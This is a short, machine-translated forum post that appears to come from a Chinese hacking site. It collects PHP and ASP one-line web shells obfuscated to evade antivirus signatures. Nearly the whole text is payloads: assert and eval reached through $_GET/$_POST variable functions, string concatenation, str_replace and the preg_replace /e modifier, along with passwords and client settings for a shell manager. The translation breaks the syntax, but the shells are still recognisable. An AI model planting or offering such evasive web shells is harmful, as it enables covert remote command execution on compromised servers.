Analysis of php sentence-free kill

 
First thought like this:
 
<? Php $ _ GET ['ts7'] ($ _ POST ['cmd']);?>
The client uses a kitchen knife, the password is cmd, And the url is test. php? Ts7 = assert
 
There is no signature, but the disadvantage is that assert is exposed in web logs.
 
You can use post:
 
 
<? Php $ _ POST ['ts7'] ($ _ POST ['cmd']);?>
Append data with <O> ts7 = assert </O> post.
 
These are considered here:
 
<? Php $ ts7 = (string) key ($ _ POST); $ ts7 ($ _ POST ['assert ']);?>
Suddenly, the keyword assert appeared again ..
Since the string can be used directly like this, it can also be as follows:
 
<? Php $ a = "". "s ". "s ". "e ". "r ". "t"; $ a ($ _ POST ["cmd"]);?>
Or use
 
 
$ A = str_replace (x, "", axsxxsxexrxxt)
As mentioned above, I feel
 
 
 
<? Php $ _ POST ['ts7'] ($ _ POST ['cmd']);?>
This is the most difficult one to find.
 
======================================
 
Ywisax posted this on the Forum again:
I don't know who wrote Baidu, but I didn't write any source from it. It seems that it was written by lcx:
 
Asp. This is UTF-8 encoding. Let's take a look.
 
 
 
Www.2cto.com <"CODEPAGE =" 65001 "%> <% var lcx = {'name': Request. form ('#'), 'Gender ': eval, 'age': '18', 'nickname': 'Please call me the boss '}; lcx. gender (lcx. name) + "); %> you can use ice fox.
 
 
 
<? Php @ preg_replace ("/[email]/e", $ _ POST ['H'], "error");?>
 
 
Additional data for kitchen knife:
<O> h = @ eval ($ _ POST [c]); </O>
 
[Email] and error. Let's change it. How can this problem be concealed?
Password c


The author sneaked into the night with the wind